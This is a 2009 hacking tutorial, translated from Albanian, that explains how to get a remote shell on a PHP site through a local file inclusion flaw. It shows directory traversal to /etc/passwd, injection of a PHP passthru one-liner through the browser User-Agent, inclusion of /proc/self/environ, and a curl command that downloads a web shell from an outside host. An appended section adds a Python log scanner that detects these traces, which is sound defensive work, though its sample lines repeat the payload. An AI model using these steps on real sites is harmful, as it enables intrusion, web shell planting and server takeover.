--------------------------------------------------------------
[x] Paper : [Albanian] Shell Over LFI
[+] Author : bi0
[x] Contact : bukibv@hotmail.com
[x] Date : 12/12/2009
[x] Site : www.it-security.ws / www.ssteam.ws
[x] Thanks : packetdeath,redking,sp1r1t & all my Friends ...
--------------------------------------------------------------
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[-]----------------------------[-]
| |
| 1. An LFI-Vulnerable Site |
| 2. Modifying the User Agent |
| 3. Enjoy your Shell |
| |
[-]----------------------------[-]
[1]. We need a site that is vulnerable to LFI, e.g.:
[x] http://example.com/index.php?file=search.php
We replace "search.php" with "../", and if it gives an error like the following, the site is vulnerable to LFI, e.g.:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php on line 514
Now we know that "/" is 4 directories up, so:
[x] http://example.com/index.php?file=../../../../etc/passwd
Now we check whether there are "logs" stored in: /proc/self/environ,
So we replace "/etc/passwd" with "/proc/self/environ"
[x] http://example.com/index.php?file=../../../../proc/self/environ
If we get something like "DOCUMENT_ROOT=", then we have found the "logs"
[2]. Modifying the User Agent:
Go to the Firefox URL bar and type: "about:config"
In "Filter" type: "general.useragent.extra.firefox" and something like this appears:
----------------------------------------------------------------------------
Preference name                  Status   Type    Value
general.useragent.extra.firefox  default  string  Firefox/3.5.5
----------------------------------------------------------------------------
Double-click "Firefox/3.5.5" and write this there:
<? passthru($_GET['c']); ?>
To modify the User Agent you can also use the "User Agent Switcher" Firefox add-on
[3]. Enjoy your Shell..
The modification is now finished; now we go here:
[x] http://example.com/index.php?file=../../../../proc/self/environ
At the end we append: &c=
[x] http://example.com/index.php?file=../../../../proc/self/environ&c=
If you want to place a shell, you just write:
[x] http://example.com/index.php?file=../../../../proc/self/environ&c=curl http://shellsite.com/locus7s.txt -o shell.php
You can also use another downloader ..
Now we have the shell:
[x] http://example.com/shell.php
Have fun ..
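[+] Added example, not part of the original paper: a log check for the three traces the steps above leave in a web server access log ("../" in a query value, an include of /proc/self/environ, a PHP open tag in the User-Agent). The Combined Log Format, the finding labels and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx Combined Log Format (assumed log format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
PROC_ENVIRON_RE = re.compile(r"(^|/)proc/self/environ")

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = """
203.0.113.7 - - [12/Dec/2009:10:00:01 +0000] "GET /index.php?file=search.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.5.5"
203.0.113.9 - - [12/Dec/2009:10:02:13 +0000] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.5.5"
203.0.113.9 - - [12/Dec/2009:10:05:40 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron&c= HTTP/1.1" 200 744 "-" "Mozilla/5.0 (X11; Linux) <? passthru($_GET['c']); ?>"
""".strip().splitlines()


def _decode(value, rounds=2):
    """Undo extra layers of percent-encoding (e.g. %252F -> %2F -> /)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify(line):
    """Return (client_ip, findings) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    findings = set()
    for _name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = _decode(value)
        if "../" in value:
            findings.add("path-traversal")
        if PROC_ENVIRON_RE.search(value):
            findings.add("proc-environ-include")
    if "<?" in m["ua"]:  # a PHP open tag has no place in a User-Agent
        findings.add("php-tag-in-user-agent")
    return m["ip"], findings


def scan(lines):
    """Return [(client_ip, sorted findings)] for every line with a finding."""
    results = (classify(line) for line in lines)
    return [(ip, sorted(f)) for ip, f in filter(None, results) if f]
```

A line that carries all three findings at once matches the request in step [3]; the fix on the application side is to stop passing the "file" parameter to include() unchecked.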
#EOF